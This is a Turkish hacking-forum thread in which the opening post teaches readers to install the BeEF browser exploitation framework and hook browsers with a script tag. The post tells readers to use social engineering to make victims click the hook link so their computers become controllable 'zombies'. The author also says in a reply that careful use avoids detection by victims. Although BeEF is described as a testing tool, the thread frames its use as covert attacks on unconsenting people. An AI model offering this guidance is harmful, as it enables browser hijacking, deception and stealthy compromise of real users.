İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

Beef Framework / Kill4Dead / ENIGMA Kulübü

23-03-2019 13:32
#1
Kill4Dead - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2011
Mesajlar:
1.462
Teşekkür (Etti):
163
Teşekkür (Aldı):
258
Konular:
174
Merhabalar. Bu yazımda Beef Framework nedir, ne değildir, işlevleri, kullanımı ve kullanım alanlarından bahsedeceğim.



BeEF Framework



BeEF - The Browser Exploitation Framework Project



BeEF (The Browser Exploitation Framework) oldukça kaliteli ve amacına uygun bir penetrasyon aracıdır. Bu araç genellikle siber güvenlik uzmanları tarafından ve test amaçlı kullanılmaktadır. Beef bir güvenlik ortamının güvenliğinin analiz edilmesini sağlar.



Aşağıdaki kodları sırası ile terminalde çalıştırıp Beef Framework' ün kurulumunu gerçekleştirelim.
Kod:
# sudo su
# apt-get update
# cd --
# cd /home/kullaniciadiniz/********s/
# mkdir BeefProject
# cd BeefProject/
# git clone https://github.com/beefproject/beef.git
# ./install (Beef' in kurulumunu gerçekleştiriyoruz.)
# ./beef (Beef' i kullanmaya başlıyoruz.)




RESIM 1







RESIM 2






* Öncelikle Resim1' de gördüğünüz "Example:" script' i bir yere kaydedin. Bunu kullanacağız. Karşı taraf bu linke tıkladığında bilgisayarına bağlanacağız. Artık nasıl linke tıklatacağınız sizin sosyal mühendislik becerinize kalmış.
Kod:
<script src="http://127.0.0.1:3000/hook.js"></script>
* Resim2' de gördüğünüz adresi kopyalayın ve tarayıcınıza yapıştırın. Aşağıdaki resimde gördüğünüz pencere açılacaktır.




RESIM 3


* Şimdi ise kullanıcı adı ve şifrenizi girmeniz gerekmektedir.
Kod:
Kullanıcı Adı: beef
Parola: beef
Evet artık panele girmiş bulunmaktayız.



RESIM 4


* Şu an online olan kişiler Online Browsers, online olmayan kişiler ise Offline Browsers sekmesinde gözükmekteler.
* Command sekmesine geliyoruz ve buradan hangi komutu uygulatmak istiyorsak bunu aktif ediyoruz.



RESIM 5


YEŞİL OLAN KOMUTLAR %100 ÇALIŞACAK OLAN KOMUTLARDIR.
TURUNCU OLAN KOMUTLAR %100 ÇALIŞACAK OLAN ANCAK KURBANIN FARK EDEBİLECEĞİ KOMUTLARDIR.
BEYAZ OLAN KOMUTLAR HAKKINDA BİR BİLGİ MEVCUT OLMAYAN KOMUTLARDIR.
KIRMIZI OLAN KOMUTLAR İSE ÇALIŞMA İHTİMALİ DÜŞÜK VE TEHLİKELİ KOMUTLARDIR.

Komutları çalıştırarak istediğimiz çıktıyı saldırı altındaki bilgisayarda verdirebiliriz. Kısacası saldırı altındaki bilgisayar artık bir "Zombi" PC olmuştur.







Kullanıcı İmzası
Cyber Security
Information Systems
Konu Kill4Dead tarafından (23-03-2019 13:40 Saat 13:40 ) değiştirilmiştir.
TH34MUS, ivanwasilevic, DWTCN Teşekkür etti.

25-03-2019 16:40
#2
hares42 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
05/2016
Nereden:
düşlerülkesi
Mesajlar:
487
Teşekkür (Etti):
17
Teşekkür (Aldı):
18
Konular:
87
Kurbanın bunu farketme olasılığı varmı veya antivirüslere yakalanırmı?
Kullanıcı İmzası
12.ADAM
----BEŞİKTAŞ------
İNANANLAR KAZANACAK...

-Hares42
25-03-2019 16:42
#3
DWTCN - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
12/2018
Nereden:
İstihbarat
Mesajlar:
364
Teşekkür (Etti):
108
Teşekkür (Aldı):
70
Konular:
63
Sadece Linuxta mi çalışıyor ?
Kullanıcı İmzası
ƊƜƬƇƝ
25-03-2019 17:10
#4
Kill4Dead - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2011
Mesajlar:
1.462
Teşekkür (Etti):
163
Teşekkür (Aldı):
258
Konular:
174
Alıntı:
hares42´isimli üyeden Alıntı Mesajı göster
Kurbanın bunu farketme olasılığı varmı veya antivirüslere yakalanırmı?
Fark edilme olasılığı tamamen sizin elinizde. Konuda anlattığım gibi komutları dikkatli bir şekilde uygularsanız fark edilmez. Ancak gidip ekrana message_box verdirirseniz tabi ki fark edilecektir.

Alıntı:
DWTCN´isimli üyeden Alıntı Mesajı göster
Sadece Linuxta mi çalışıyor ?
Hayır Windows' ta da kullanabilirsiniz.
BU KONUYU incelemenizde yarar var.
Kullanıcı İmzası
Cyber Security
Information Systems
25-03-2019 17:47
#5
fazeL - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2016
Nereden:
Ordugâh
Mesajlar:
694
Teşekkür (Etti):
51
Teşekkür (Aldı):
224
Konular:
43
Güzel bir konu olmuş. Başarılar diliyorum bütün kulübe.
Kullanıcı İmzası
"Meşrutiyeti her derde deva sanıyorlar. Denesinler, görsünler..."

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı